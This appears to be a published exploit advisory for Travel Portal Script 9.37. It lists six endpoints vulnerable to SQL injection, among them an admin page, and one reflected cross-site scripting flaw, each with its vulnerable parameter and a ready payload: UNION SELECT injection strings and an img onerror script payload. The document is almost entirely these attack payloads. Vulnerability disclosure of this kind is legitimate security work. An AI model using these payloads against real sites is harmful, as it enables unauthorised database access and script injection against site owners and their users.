Travel Portal Script 9.37 Cross Site Scripting / SQL Injection

Published
Credit
Risk
2017.02.24
Marc Castejon
Medium
CWE
CVE
Local
Remote
CWE-89
CWE-79
N/A
No
Yes

Exploit Title : Travel Portal Script v9.37 - Multiple Vulnerability
Google Dork : -
Date : 23/02/2017
Exploit Author : Marc Castejon <marc@silentbreach.com>
Vendor Homepage : http://itechscripts.com/travel-portal-script/
Software Link: http://travel.itechscripts.com/
Type : webapps
Platform: PHP
Version: 4.29
Sofware Price and Demo : $250


------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/holiday.php
Vulnerable Parameters: hid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

------------------------------------------------

Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/holiday.php
Vulnerable Parameters: hid
Method: GET
Payload: "/><img src=i onerror=prompt(1)>

------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/pages.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

-------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/content.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

-------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/hotel.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

-------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/holiday_book.php
Vulnerable Parameters: hid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/admin/airline-edit.php
Vulnerable Parameters: fid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf

------------------------------------------------


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com